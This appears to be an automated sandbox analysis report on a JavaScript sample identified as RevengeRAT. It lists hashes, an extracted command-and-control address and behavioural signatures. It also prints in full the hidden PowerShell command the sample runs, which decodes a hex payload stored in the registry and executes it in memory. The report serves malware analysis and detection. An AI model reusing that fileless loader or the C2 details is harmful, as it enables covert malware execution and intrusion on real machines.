Analysis
-
max time kernel
146s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-01-2025 03:19
Static task
static1
Behavioral task
behavioral1
Sample
862502255d9fd9eb8f658e23f3833e7cd211514cb9f9a6a2853ae9858d3843f7.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
862502255d9fd9eb8f658e23f3833e7cd211514cb9f9a6a2853ae9858d3843f7.js
Resource
win10v2004-20241007-en
General
-
Target
862502255d9fd9eb8f658e23f3833e7cd211514cb9f9a6a2853ae9858d3843f7.js
-
Size
253KB
-
MD5
453bc0d9d84305bd4811c8c0c8622db6
-
SHA1
85553506f2dc5abcec56a06cb36f69c0b046efa4
-
SHA256
862502255d9fd9eb8f658e23f3833e7cd211514cb9f9a6a2853ae9858d3843f7
-
SHA512
af6ef42e885481ae3bc0939017c8eb328531ea50d7eb852bd7b5b744a70d202e57f09f2671ab1553c05d4c53181973896c44109e7eb19f7fb0d087f697632d87
-
SSDEEP
6144:p8t+pgvJENiy2BMs+1WKKL7EVLy19uQTuol9nv2RWoaAImBeN1PXY1qm:p8kpgvJENZ2JJLm
Malware Config
Extracted
revengerat
NyanCatRevenge
13.49.66.229:333
8a25aa6e78e44708a
Signatures
-
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
Revengerat family
-
Blocklisted process makes network request 31 IoCs
flow pid Process 2 1808 powershell.exe 3 1808 powershell.exe 4 1808 powershell.exe 5 1808 powershell.exe 6 1808 powershell.exe 7 1808 powershell.exe 8 1808 powershell.exe 9 1808 powershell.exe 10 1808 powershell.exe 11 1808 powershell.exe 12 1808 powershell.exe 13 1808 powershell.exe 14 1808 powershell.exe 15 1808 powershell.exe 16 1808 powershell.exe 17 1808 powershell.exe 18 1808 powershell.exe 19 1808 powershell.exe 20 1808 powershell.exe 21 1808 powershell.exe 22 1808 powershell.exe 23 1808 powershell.exe 24 1808 powershell.exe 25 1808 powershell.exe 26 1808 powershell.exe 27 1808 powershell.exe 28 1808 powershell.exe 29 1808 powershell.exe 30 1808 powershell.exe 31 1808 powershell.exe 32 1808 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1808 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1808 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1808 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2680 wrote to memory of 1808 2680 wscript.exe 30 PID 2680 wrote to memory of 1808 2680 wscript.exe 30 PID 2680 wrote to memory of 1808 2680 wscript.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\862502255d9fd9eb8f658e23f3833e7cd211514cb9f9a6a2853ae9858d3843f7.js1⤵
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\' -name 'KeyName').KeyName;$_b=$_b.replace('~','30');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1808
-